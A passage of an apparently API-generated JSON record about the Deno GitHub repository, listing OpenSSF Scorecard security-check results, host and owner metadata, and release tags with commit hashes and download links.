tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d